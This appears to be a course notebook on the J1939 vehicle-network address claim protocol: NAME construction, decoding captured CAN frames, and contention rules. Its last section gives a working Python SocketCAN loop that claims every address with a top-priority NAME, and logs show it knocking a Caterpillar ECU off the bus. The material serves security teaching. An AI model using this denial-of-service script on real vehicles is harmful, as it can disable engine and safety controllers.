# <center> J1939 Address Claim
## <center> SYSE 549: Secure Vehicle and Industrial Networking
## <center><img src="https://www.engr.colostate.edu/~jdaily/Systems-EN-CSU-1-C357.svg" width="400" />
### <center> Instructor: Dr. Jeremy Daily

## J1939 Address Claim
J1939 has use cases where systems that utilize J1939 are reconfigured frequently. These scenarios include adding and removing construction or agriculture implemements or otherwise altering the vehicle network. In these situations, there is a risk of two controller applications (CAs) using the same source address (SA). Since messaging in J1939 includes a peer-to-peer mode with a source and destination address, there needs to be a mechanism to claim an address.

###  Technical Requirements 
SAE J1939-81 specifies some requirements:
1. Controller Applications must be capable of providing its unique 64-bit NAME.
2. CAs must claim an address before sending messages
3. Unsuccessful address claims must be handled and reported to the network.
4. A CA must follow the address claiming initialization.
5. A CA must support network managment requirements, including responses to power interruptions. 

#### The 64-bit NAME
SAE defines the following fields in a 64-bin NAME:

* 1 Bit : Arbitrary Address Capable
* 3 Bits: Industry Group (SAE)
* 4 Bits: Vehicle Systems Instance
* 7 Bits: Vehicle System (SAE)
* 1 Bit : Reserved (SAE)
* 8 Bits: Function (SAE)
* 5 Bits: Function Instance
* 3 Bits: ECU Instance
* 11 Bits: Manufacturer Code (SAE)
* 21 Bits: Identity

Some of these fields are specified by SAE in the J1939-81 standard; others are specified by manufacturers. The details of these are as follows:
1. Arbitrary Address Capable: Indicates if a CA can negotiate its address. If the bit is set, then it can negotiate. If the bit = 0, then it cannot, which means it will always want to keep its address.
2. Industry Group: These bits refer to the particular industy, like on-highway, construction, marine, etc.
3. Vehicle Systems Instance: a number for each instance on a vehicle system in case there are several networks (e.g. train cars).
4. Vehicle System: These are associated with industry groups and specify what kind of vehicle we are discussing, like  a tractor or a trailer.
5. Reserved: Specified to be zero.
6. Function: This is a code that if it is between 128 and 255, it would be associated with a particular industry group. If it is between 0 and 127, then it is not associated with other parameters.
7. ECU Instance: There may be multiple CAs of the same kind (i.e. multiple engines on a boat), so the intance distinguishes them. 
8. Manufacturer Code: This code is assigned by SAE to different manufacturers.
9. Identity Number: The is like a serial number assigned by the manufacturer.


The J1939DA_2020.xls spreadsheet (i.e. the Digital Annex) has tables for all the NAME fields.

In [1]:
# We'll need to align bits and bytes so we need the struct library
import struct

### NAME Building
Let's build a name for a secure gateway device. This device may act as a gateway for the vehicle J1939 network to a telematics device to communicate with a back office server. 

In [2]:
# Start with the first byte
# 1 Bit : Arbitrary Address Capable = 1 (true)
# 3 Bits: Industry Group (SAE) = 1 (on-highway equipment)
# 4 Bits: Vehicle Systems Instance = 1 (the first instance)
arbitrary_address_capable_mask = 0b10000000
industry_group_mask = 0b01110000
veh_sys_instance_mask = 0b00001111

arbitrary_address_capable = 1
industry_group = 1
veh_sys_instance = 1

# Construct byte 8 according to J1939-81
NAME_8 = arbitrary_address_capable_mask & arbitrary_address_capable << 7
NAME_8 |= industry_group_mask & industry_group << 4
NAME_8 |= veh_sys_instance_mask & veh_sys_instance
print("NAME_8 = 0b{:08b}".format(NAME_8))
NAME = struct.pack('B',NAME_8)
NAME

NAME_8 = 0b10010001


b'\x91'

In [3]:
#masks show the coverage of bytes 
print("{:08b}".format(arbitrary_address_capable_mask))
print("{:08b}".format(industry_group_mask))
print("{:08b}".format(veh_sys_instance_mask))


10000000
01110000
00001111


## Vehicle Systems and Functions
The description of the vehicle systems depends on in industry group. There are 6 industry groups as follows:

| Industry Group ID | Industry Group Description |
| :-: | :-- |
| 0 | Global, applies to all |
| 1 | On-Highway Equipment |
| 2 | Agricultural and Forestry Equipment |
| 3 | Construction Equipment |
| 4 | Marine |
| 5 | Industrial-Process Control-Stationary (Gen-Sets) |

Based on the industry group, there are different systems. Many common systems are global and do not have a specific system. This means many NAME fields for the industrial group and system ID will be zero.

| Industry Group ID | Vehicle System ID | Vehicle System Description|
| :-: |  :-: |  :- |
| 0 | 0	 | Non-specific System |
| 1 | 0	 | Non-specific System |
| 1 | 1	 | Tractor |
| 1 | 2	 | Trailer |
| 2 | 0	 | Non-specific System |
| 2 | 1	 | Tractor |
| 2 | 2	 | Tillage |
| 2 | 3	 | Secondary Tillage |
| 2 | 4	 | Planters/Seeders |
| 2 | 5	 | Fertilizers |
| 2 | 6	 | Sprayers |
| 2 | 7	 | Harvesters |
| 2 | 8	 | Root Harvesters |
| 2 | 9	 | Forage |
| 2 | 10 | 	Irrigation |
| 2 | 11 | 	Transport/Trailer |
| 2 | 12 | 	Farm Yard Operations |
| 2 | 13 | 	Powered Auxiliary Devices |
| 2 | 14 | 	Special Crops |
| 2 | 15 | 	Earth Work |
| 2 | 16 | 	Skidder |
| 2 | 17 | 	Sensor Systems |
| 2 | 19 | 	Timber Harvesters |
| 2 | 20 | 	Forwarders |
| 2 | 21 | 	Timber Loaders |
| 2 | 22 | 	Timber Processing Machines |
| 2 | 23 | 	Mulchers |
| 2 | 24 | 	Utility Vehicles |
| 2 | 25 | 	Slurry/Manure Applicators |
| 2 | 26 | 	Feeders/Mixers |
| 2 | 27 | 	Weeders |


In [4]:
# Let's build Byte 7
# 7 Bits: Vehicle System (SAE) 
# 1 Bit : Reserved (SAE) = 0
vehicle_system_mask = 0b11111110
vehicle_system = 0 #Global, Non-specific System
NAME_7 = vehicle_system_mask & vehicle_system << 1
print("NAME_7 = 0b{:08b}".format(NAME_7))
NAME += struct.pack('B',NAME_7)
NAME

NAME_7 = 0b00000000


b'\x91\x00'

### All Industry Group Inclusive NAME Functions 
There are lists in the J1939 Digital Annex that describes the different functions. The main list is the Global Name Functions, and the second is the Industry Group Specific Name Functions.

Here is an example of a table entry in the global list

Function ID: 28

Function description: Off Vehicle Gateway

Notes: ECU for connecting between vehicle network(s) and an off-vehicle system or network, such as fleet management. Connection may be wireless. Performs Gateway functions, i.e., filters messages, translates between protocols. 

### Industry Group and Vehicle System Dependent NAME Functions 
Vehicle System is a 7-bit field defined by SAE J1939-81. It is combined with the
Industry Group to represent a common name. See J1939 (top-level document) Appendix B, Table
B12. Vehicle System provides a common name for a group of functions within a connected network.
Examples of Vehicle Systems for currently defined Industry Groups are "tractor" in the "Common” Industry Group, “Trailer” in the On-Highway Industry Group, and planter in the "Agricultural Equipment” Industry Group.



In [5]:
# Let's build Byte 6
# 8 Bits: Function (SAE) 

vehicle_function_mask = 0xFF
vehicle_function = 28 #Off Vehicle Gateway
NAME_6 = (vehicle_function_mask & vehicle_function)
print("NAME_6 = 0b{:08b}".format(NAME_6))
NAME += struct.pack('B',NAME_6)
NAME

NAME_6 = 0b00011100


b'\x91\x00\x1c'

In [6]:
# NAME Byte 5 has the following:
# 5 Bits: Function Instance
# 3 Bits: ECU Instance
function_instance_mask = 0b00011111
ecu_instance_mask = 0b11100000

function_instance = 1
ecu_instance = 1


# Construct byte 8 according to J1939-81
NAME_5 = ecu_instance_mask & ecu_instance << 5
NAME_5 |= function_instance_mask & function_instance
print("NAME_5 = 0b{:08b}".format(NAME_5))
NAME += struct.pack('B',NAME_5)
NAME

NAME_5 = 0b00100001


b'\x91\x00\x1c!'

In [7]:
# Now we can create a 32-bit work comprising the Manufacturer and their serial number.
# 11 Bits: Manufacturer Code (SAE)
# 21 Bits: Identity

manufacturer_code = 45 #This is made up and doesn't have an entry in the table.
manufacturer_code_mask = 0xFFE00000

identity = 123456
identity_mask = 0x001FFFFF

NAME_ID = manufacturer_code_mask & manufacturer_code << 21
NAME_ID |= identity_mask & identity 

print("ma_code = 0b{:032b}".format(manufacturer_code)) 
print("NAME_ID = 0b{:032b}".format(NAME_ID)) 
print("NAME_ID = 0x{:08X}".format(NAME_ID)) 
NAME += struct.pack('>L',NAME_ID)
NAME

ma_code = 0b00000000000000000000000000101101
NAME_ID = 0b00000101101000011110001001000000
NAME_ID = 0x05A1E240


b'\x91\x00\x1c!\x05\xa1\xe2@'

In [10]:
# Create a 64-bit NAME field
NAME_bytes = struct.pack("4B",NAME_8,NAME_7,NAME_6,NAME_5)
NAME_bytes += struct.pack(">L", NAME_ID)
print(NAME_bytes)
name_int = struct.unpack(">Q",NAME_bytes)[0]
print("NAME_bytes = {:08X}".format(name_int))
print("NAME_bits  = {:064b}".format(name_int))

b'\x91\x00\x1c!\x05\xa1\xe2@'
NAME_bytes = 91001C2105A1E240
NAME_bits  = 1001000100000000000111000010000100000101101000011110001001000000


### Preferred Address
For a quick address claiming process, ECUs and CAs should have a preferred address. 
The following are some preferred addresses:

In [44]:
import json
source_address_dict = {}
addresses = """
  0	Engine #1
  1	Engine #2
  2	Turbocharger
  3	Transmission #1
  4	Transmission #2
  5	Shift Console - Primary
  6	Shift Console - Secondary
  7	Power TakeOff - (Main or Rear)
  8	Axle - Steering
  9	Axle - Drive #1
 10	Axle - Drive #2
 11	Brakes - System Controller
 12	Brakes - Steer Axle
 13	Brakes - Drive axle #1
 14	Brakes - Drive Axle #2
 15	Retarder - Engine
 16	Retarder - Driveline
 17	Cruise Control
 18	Fuel System
 19	Steering Controller
 20	Suspension - Steer Axle
 21	Suspension - Drive Axle #1
 22	Suspension - Drive Axle #2
 23	Instrument Cluster #1
 24	Trip Recorder
 25	Passenger-Operator Climate Control #1
 26	Alternator/Electrical Charging System
 27	Aerodynamic Control
 28	Vehicle Navigation
 29	Vehicle Security
 30	Electrical System
 31	Starter System
 32	Tractor-Trailer Bridge #1
 33	Body Controller
 34	Auxiliary Valve Control or Engine Air System Valve Control
 35	Hitch Control
 36	Power TakeOff (Front or Secondary)
 37	Off Vehicle Gateway
 38	Virtual Terminal (in cab)
 39	Management Computer #1
 40	Cab Display #1
 41	Retarder, Exhaust, Engine #1
 42	Headway Controller
 43	On-Board Diagnostic Unit
 44	Retarder, Exhaust, Engine #2
 45	Endurance Braking System
 46	Hydraulic Pump Controller
 47	Suspension - System Controller #1
 48	Pneumatic - System Controller
 49	Cab Controller - Primary
 50	Cab Controller - Secondary
 51	Tire Pressure Controller
 52	Ignition Control Module #1
 53	Ignition Control Module #2
 54	Seat Control #1
 55	Lighting - Operator Controls
 56	Rear Axle Steering Controller #1
 57	Water Pump Controller
 58	Passenger-Operator Climate Control #2
 59	Transmission Display - Primary
 60	Transmission Display - Secondary
 61	Exhaust Emission Controller
 62	Vehicle Dynamic Stability Controller
 63	Oil Sensor
 64	Suspension - System Controller #2
 65	Information System Controller #1
 66	Ramp Control
 67	Clutch/Converter Unit
 68	Auxiliary Heater #1
 69	Auxiliary Heater #2
 70	Engine Valve Controller
 71	Chassis Controller #1
 72	Chassis Controller #2
 73	Propulsion Battery Charger
 74	Communications Unit, Cellular
 75	Communications Unit, Satellite
 76	Communications Unit, Radio
 77	Steering Column Unit
 78	Fan Drive Controller
 79	Seat Control #2
 80	Parking Brake Controller
 81	Aftertreatment #1 system gas intake
 82	Aftertreatment #1 system gas outlet
 83	Safety Restraint System
 84	Cab Display #2
 85	Diesel Particulate Filter Controller
 86	Aftertreatment #2 system gas intake
 87	Aftertreatment #2 system gas outlet
 88	Safety Restraint System #2
 89	Atmospheric Sensor
 90	Powertrain Control Module
 91	Power Systems Manager
 92	Engine Injection Control Module
 93	Fire Protection System
 94	Driver Impairment Device
 128	thru 247	Used for dynamic address assignment
 248	File Server / Printer
 249	Off Board Diagnostic-Service Tool #1
 250	Off Board Diagnostic-Service Tool #2
 251	On-Board Data Logger
 254	Null Address
 255	GLOBAL
"""
address_list = addresses.split("\n")
for line  in address_list:
    try:
        entry = line.strip('* ').split('\t')
    except IndexError:
        continue
    #print(entry)
    if len(entry) < 2:
        continue
   
    sa = int(entry[0])
    meaning = entry[1].strip()
    source_address_dict[sa]=meaning

with open('J1939SourceAddressDB.json','w') as fp:
    json.dump(source_address_dict,fp, indent=4,sort_keys=True)

### Serializing the Source Addresses
The JSON format is great for storing the dictionary. However, it stores the keys as strings, not integers. Integer keys are faster during lookup, so the the prefered way is to use the dictionary with integer keys. This means we have to convert the string keys to integer keys. With a little help from the internet, we can use a quick recursive function to make the conversion when we load the JSON based file.

https://stackoverflow.com/questions/17099556/why-do-int-keys-of-a-python-dict-turn-into-strings-when-using-json-dumps

In [12]:
# https://stackoverflow.com/questions/17099556/why-do-int-keys-of-a-python-dict-turn-into-strings-when-using-json-dumps
def pythonify(json_data):

    correctedDict = {}

    for key, value in json_data.items():
        if isinstance(value, list):
            value = [pythonify(item) if isinstance(item, dict) else item for item in value]
        elif isinstance(value, dict):
            value = pythonify(value)
        try:
            key = int(key)
        except Exception as ex:
            pass
        correctedDict[key] = value

    return correctedDict

In [14]:
# Load the JSON and convert the keys.
with open('J1939SourceAddressDB.json','r') as fp:
    #SAs = json.load(fp)
    SAs = pythonify(json.load(fp))
for k,v in SAs.items():
    print(k,v)
    break
type(k)

0 Engine #1


int

## Address Claim Procedure
The following procedure was adapted from the book entitled "SAE J1939 ECU Programming and Vehicle Bus Simulation" by Wilfried Voss.

In this diagram, the goal of the address claim procedure is to end up at the Normal Data Traffic process. However, there are scenarios where that doesn't happen. We will explore those.

![AddressClaimProcedure.svg](AddressClaimProcedure.svg)

### Looking for an Address Claim
During startup of an ECU on J1939, an Address Claimed Message will often be broadcast. Here's an example.

The following command was given from a Linux terminal 
```
candump any | grep 18EE
```
That gives the following output
```
  can1  18EEFF00   [8]  06 03 BF 01 00 00 00 10
  can1  18EEFF00   [8]  06 03 BF 01 00 00 00 10
  can1  18EEFF00   [8]  06 03 BF 01 00 00 00 10
```
To interpret this message, we start with breaking down the ID. Let's break it into 4 parts: 18 EE FF 00

* Priority: 6 (0x18 >> 2)
* PGN: 0xEE00 = 60928 (Address Claim)
* Destination Address: 0xFF = 255 (Global)
* Source Address: 0x00 (Engine #1)

Next, we decode the different bytes from the message, which makes up the NAME field.
The following table shows the position and interpretation of the data in NAME according to J1939-81.

| Byte | Bits | Description | Value |
| --- | --- | --- | --- | 
| Byte 1 | Bits 8-1 | Least significant byte of Identity Number | 0x06 |
| Byte 2 | Bits 8-1 | Second byte of Identity Number |0x03|
| Byte 3 | Bits 8-6 | Least significant 3 bits of Manufacturer Code | 0xBF |
| Byte 3 | Bits 5-1 | Most significant 5 bits of Identity Number | 0xBF  |
| Byte 4 | Bits 8-1 | Most significant 8 bits of Manufacturer Code | 0x01 |
| Byte 5 | Bits 8-4 | Function Instance | 0x00 |
| Byte 5 | Bits 3-1 | ECU Instance | 0x00 |
| Byte 6 | Bits 8-1 | Function  | 0x00 |
| Byte 7 | Bits 8-2 | Vehicle System  | 0x00 |
| Byte 7 | Bit 1 | Reserved | 0x00 |
| Byte 8 | Bit 8 | Arbitrary Address Capable | 0x10 |
| Byte 8 | Bits 7-5 | Industry Group | 0x10 |
| Byte 8 | Bits 4-1 | Vehicle System Instance | 0x10 |

Let's parse these a little better.



In [19]:
name_bytes = bytes.fromhex('06 03 BF 01 00 00 00 10')
#name_bytes = bytes.fromhex('00 00 60 01 00 81 00 00')
name_bytes

b'\x06\x03\xbf\x01\x00\x00\x00\x10'

In [20]:
NAME_8 = name_bytes[7]

arbitrary_address_capable = (arbitrary_address_capable_mask & NAME_8 ) >> 7
print('arbitrary_address_capable =', arbitrary_address_capable)

industry_group = (industry_group_mask & NAME_8) >> 4
print('industry_group =', industry_group)

veh_sys_instance = (veh_sys_instance_mask & NAME_8)
print('veh_sys_instance =', veh_sys_instance)

arbitrary_address_capable = 0
industry_group = 1
veh_sys_instance = 0


The industry group is 1, which is the On-Highway Equipment group.

Bytes 7, 6 and 5 are all zeros, which indicates nonspecific vehicle system IDs, and the first instance of the Engine.

In [21]:
NAME_ID = struct.unpack("<L",name_bytes[0:4])[0]
manufacturer_code = (manufacturer_code_mask & NAME_ID) >> 21
print("NAME_ID = 0b{:032b}".format(NAME_ID)) 
print('manufacturer_code =', manufacturer_code)

serial_num = identity_mask & NAME_ID
print('serial_num = ',serial_num)


NAME_ID = 0b00000001101111110000001100000110
manufacturer_code = 13
serial_num =  2032390


The manufacture for 13 is Delco Electronics. The ECU we were connected to was made by Delphi, which used to be Delco.

### Send an Address Claimed Message
The J1939 address claimed message has a pgn of 60928 (0xEE00). 

Let's craft a message and send it out on the network. We'll try to claim source address 0, which is an engine controller.

In [22]:
import socket
import struct

# Open a socket and bind to it from SocketCAN
sock = socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW)

#Change this interface to match your desired connection
interface = "can1"

# Bind to the interface
sock.bind((interface,))

# To match the socketCAN data structure, the following struct format can be used:
can_frame_format = "<lB3x8s"

### Script to make an address claim

In [23]:
# Let's send the same message that we recieved from the engine controller to 
# see what happens
can_id = 0x18EEFF00

#Set the extended frame format bit.
can_id |= socket.CAN_EFF_FLAG
    
can_data = name_bytes

can_dlc = min(len(can_data),8)

can_packet = struct.pack(can_frame_format, can_id, can_dlc, can_data[:can_dlc] )
print(can_packet)
    
#Send out the CAN frame
sock.send(can_packet)

b'\x00\xff\xee\x98\x08\x00\x00\x00\x06\x03\xbf\x01\x00\x00\x00\x10'


16

When this happens when connected to a Caterpillar, we can see the data:
```
  can1  18EEFF00   [8]  06 03 BF 01 00 00 00 10
  can1  18EEFF80   [8]  D0 6B 01 01 00 00 00 80
  can1  18EEFF80   [8]  D0 6B 01 01 00 00 00 80
````
Our message was the top message. The Caterpillar responded with a new address claimed: 0x80, which is the first address in line for dynamically allocated source addresses. 

Notice the NAME for the Caterpillar has the 8th bit in the 8th byte set, which means the Address is dynamically allocatable.

In [24]:
arbitrary_address_capable = (arbitrary_address_capable_mask & 0x80 ) >> 7
print('arbitrary_address_capable =', arbitrary_address_capable)

arbitrary_address_capable = 1


In [25]:
# Let's claim the the retarder address, 0x0F.
can_id = 0x18EEFF0F

#Set the extended frame format bit.
can_id |= socket.CAN_EFF_FLAG
    
can_data = name_bytes

can_dlc = min(len(can_data),8)

can_packet = struct.pack(can_frame_format, can_id, can_dlc, can_data[:can_dlc] )
print(can_packet)
    
#Send out the CAN frame
sock.send(can_packet)

b'\x0f\xff\xee\x98\x08\x00\x00\x00\x06\x03\xbf\x01\x00\x00\x00\x10'


16

The response is
```
debian@beaglebone:~/TruckCapeProjects$ candump any |grep 18EE
  can1  18EEFF0F   [8]  06 03 BF 01 00 00 00 10
  can1  18EEFF81   [8]  01 02 03 01 00 0C 00 90
  can1  18EEFF80   [8]  D0 6B 01 01 00 00 00 80
  can1  18EEFF81   [8]  01 02 03 01 00 0C 00 90
```
which shows the the new addresses for the Cat engine controller application and retarder application.

In [31]:
# Send a request message
# 0x18 sets the priority to 6
# 0xEA00 is the Request PGN
# 0xFF is the global destination address. This could be for just the engine too (0x00)
# 0xFE is the null address (used for devices without source addresses)
can_id = 0x18EAFFFE

#Set the extended frame format bit.
can_id |= socket.CAN_EFF_FLAG
  
# Request the Address Claimed PGN
can_data = b'\x00\xee\x00'

can_dlc = min(len(can_data),8)

can_packet = struct.pack(can_frame_format, can_id, can_dlc, can_data[:can_dlc] )
print(can_packet)
    
#Send out the CAN frame
sock.send(can_packet)

b'\xfe\xff\xea\x98\x03\x00\x00\x00\x00\xee\x00\x00\x00\x00\x00\x00'


16

The response to this request from the PACCAR ECM was  its address claimed:

```
can1  18EEFF00   [8]  06 03 BF 01 00 00 00 10
```

If we send this to a Caterpillar ECU, we get the following:
```
  can1  18EEFF00   [8]  D0 6B 01 01 00 00 00 80
  can1  18EEFF0F   [8]  01 02 03 01 00 0C 00 90
```

In [33]:
#NAME_ID = struct.unpack("<L",b'\x01\x02\x03\x01')[0]
NAME_ID = struct.unpack("<L",b'\xD0\x6B\x01\x01')[0]
manufacturer_code = (manufacturer_code_mask & NAME_ID) >> 21
print("NAME_ID = 0b{:032b}".format(NAME_ID)) 
print('manufacturer_code =', manufacturer_code)

serial_num = identity_mask & NAME_ID
print('serial_num = ',serial_num)

NAME_ID = 0b00000001000000010110101111010000
manufacturer_code = 8
serial_num =  93136


In J1939, the following entry exists for Manufacturer IDs
```
8	Caterpillar Inc.	Peoria, IL   USA
```

### Resolving Contentions
Why did the Caterpillar give up it's address?

The NAME with the lower value wins.

In [34]:
NAME_cat = bytes.fromhex('D0 6B 01 01 00 00 00 80')
NAME_paccar = bytes.fromhex('06 03 BF 01 00 00 00 10')

In [35]:
#Convert these NAMEs to numerical values:
number_cat = struct.unpack("<Q",NAME_cat)[0]
number_cat

9223372036871646160

In [36]:
number_paccar = struct.unpack("<Q",NAME_paccar)[0]
number_paccar

1152921504636142342

In [37]:
if number_paccar < number_cat:
    print("PACCAR ECU has the lower NAME, thus a higher priority.")
else:
    print("CAT ECU has the lower NAME, thus a higher priority.")

PACCAR ECU has the lower NAME, thus a higher priority.


Let's try this experiment again, but with a high number for the NAME. Specifically, let's set the NAME to all 1's.

In [39]:
can_id = 0x18EEFF80

#Set the extended frame format bit.
can_id |= socket.CAN_EFF_FLAG
  
# Make a low priority NAME
can_data = b'\xFF'*8

can_dlc = min(len(can_data),8)

can_packet = struct.pack(can_frame_format, can_id, can_dlc, can_data[:can_dlc] )
print(can_packet)
    
#Send out the CAN frame
sock.send(can_packet)

b'\x80\xff\xee\x98\x08\x00\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff'


16

The network session record for Address Claimed is
```
debian@beaglebone:~/TruckCapeProjects$ candump any |grep 18EE
  can1  18EEFF00   [8]  D0 6B 01 01 00 00 00 80
  can1  18EEFF0F   [8]  01 02 03 01 00 0C 00 90
  can1  18EEFF00   [8]  D0 6B 01 01 00 00 00 80
  can1  18EEFF0F   [8]  01 02 03 01 00 0C 00 90
  can1  18EEFF00   [8]  FF FF FF FF FF FF FF FF
  can1  18EEFF00   [8]  D0 6B 01 01 00 00 00 80
```

The CAT module send out 2 copies of the Address Claim messages, one for the Engine controller application and the other for the engine retarder application.

The script above produced a claim on the source address of 0x00 with a NAME of all F's. This means is a large number and would have low priority. So, the CAT module responded and asserted it's address again. 

If the script above was compliant with J1939, then then next step would be to select a new address. 

If there were no new addresses available, then the ECU would have to send out a notice that no more addresses were available. It does this by claiming the null address, which is 0xFE = 254.


## Address Claim Cyber Attack
The protocol for claiming addresses on J1939 has a fundamental flaw from a security perspective... it trusts the address claim of other nodes without a check on their legitimacy. Furthermore, the protocol requires controller applications that can't claim an address to stop participating on the network. This means

In [41]:
import time

In [42]:
# Let's claim all the addresses with high priority NAMEs
for sa in range(0,253): 

    can_id = 0x18EEFF00 + sa

    #Set the extended frame format bit.
    can_id |= socket.CAN_EFF_FLAG

    # Make a high priority name
    can_data = b'\x00'*8

    can_dlc = min(len(can_data),8)

    can_packet = struct.pack(can_frame_format, can_id, can_dlc, can_data[:can_dlc] )
    print(can_packet)

    #Send out the CAN frame
    sock.send(can_packet)
    time.sleep(.1)

b'\x00\xff\xee\x98\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
b'\x01\xff\xee\x98\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
b'\x02\xff\xee\x98\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
b'\x03\xff\xee\x98\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
b'\x04\xff\xee\x98\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
b'\x05\xff\xee\x98\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
b'\x06\xff\xee\x98\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
b'\x07\xff\xee\x98\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
b'\x08\xff\xee\x98\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
b'\t\xff\xee\x98\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
b'\n\xff\xee\x98\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
b'\x0b\xff\xee\x98\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
b'\x0c\xff\xee\x98\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
b'\r\xff\xee\x98\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
b'\x0e\xff\xee\x98\x08\x00\x00\x00\x00\x00\x00\x00\x00

b'\x7f\xff\xee\x98\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
b'\x80\xff\xee\x98\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
b'\x81\xff\xee\x98\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
b'\x82\xff\xee\x98\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
b'\x83\xff\xee\x98\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
b'\x84\xff\xee\x98\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
b'\x85\xff\xee\x98\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
b'\x86\xff\xee\x98\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
b'\x87\xff\xee\x98\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
b'\x88\xff\xee\x98\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
b'\x89\xff\xee\x98\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
b'\x8a\xff\xee\x98\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
b'\x8b\xff\xee\x98\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
b'\x8c\xff\xee\x98\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
b'\x8d\xff\xee\x98\x08\x00\x00\x00\x00\x00\x00\x

b'\xf8\xff\xee\x98\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
b'\xf9\xff\xee\x98\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
b'\xfa\xff\xee\x98\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
b'\xfb\xff\xee\x98\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
b'\xfc\xff\xee\x98\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'


When connected to a CAT ECU, it starts with normal traffic, then the following transactions take place.
The first line is a high priority address claim. Then the script marches through the output. Notes on the right side of the candump output annotate specific notes.
```
  can1  18EEFF00   [8]  00 00 00 00 00 00 00 00 - Initial high priority address claim
  can1  18EEFF80   [8]  D0 6B 01 01 00 00 00 80 - Reclaim of a dynamic address
  can1  18EEFF01   [8]  00 00 00 00 00 00 00 00 - move to the next address and claim it
  can1  18EEFF02   [8]  00 00 00 00 00 00 00 00
  can1  18EEFF80   [8]  D0 6B 01 01 00 00 00 80 - The cat module repeat the claim on address 128
  can1  18EEFFFE   [8]  01 02 03 01 00 0C 00 90 - The retarder sets the null address, so no address claimed.
  can1  18EEFF03   [8]  00 00 00 00 00 00 00 00
  can1  18EEFF04   [8]  00 00 00 00 00 00 00 00
  ...
  can1  18EEFF7E   [8]  00 00 00 00 00 00 00 00
  can1  18EEFF7F   [8]  00 00 00 00 00 00 00 00
  can1  18EEFF80   [8]  00 00 00 00 00 00 00 00 - Claim the address 128
  can1  18EEFF81   [8]  D0 6B 01 01 00 00 00 80 - The Cat reacts and claims 129
  can1  18EEFF81   [8]  00 00 00 00 00 00 00 00 - Claim 129 away from the Cat
  can1  18EEFF82   [8]  D0 6B 01 01 00 00 00 80 
  can1  18EEFF82   [8]  00 00 00 00 00 00 00 00
  can1  18EEFF83   [8]  D0 6B 01 01 00 00 00 80
  can1  18EEFF83   [8]  00 00 00 00 00 00 00 00
  ...
  can1  18EEFFF4   [8]  00 00 00 00 00 00 00 00
  can1  18EEFFF5   [8]  D0 6B 01 01 00 00 00 80
  can1  18EEFFF5   [8]  00 00 00 00 00 00 00 00
  can1  18EEFFF6   [8]  D0 6B 01 01 00 00 00 80
  can1  18EEFFF6   [8]  00 00 00 00 00 00 00 00
  can1  18EEFFF7   [8]  D0 6B 01 01 00 00 00 80
  can1  18EEFFF7   [8]  00 00 00 00 00 00 00 00 - Claim the last available dynamically allocatable address
  can1  18EEFFFE   [8]  D0 6B 01 01 00 00 00 80 - Cat claims the null address, it can't make a claim
  can1  18EEFFF8   [8]  00 00 00 00 00 00 00 00
  can1  18EEFFF9   [8]  00 00 00 00 00 00 00 00
  can1  18EEFFFA   [8]  00 00 00 00 00 00 00 00
  can1  18EEFFFB   [8]  00 00 00 00 00 00 00 00
  can1  18EEFFFC   [8]  00 00 00 00 00 00 00 00
```
At this point, the ECU stops all network transmission. It's stuck in the address claim loop. 

Therefore, it's fairly easly to deny service of an ecu that is compliant with SAE J1939-81.

### Recommendation:
Don't follow the SAE J1939-81 specifications if the messages from the ECU are important to the function of the system. For fixed configurations, like trucks, non-configurable addresses are prefered. Stopping network traffic voluntarily may not be a good design choice. 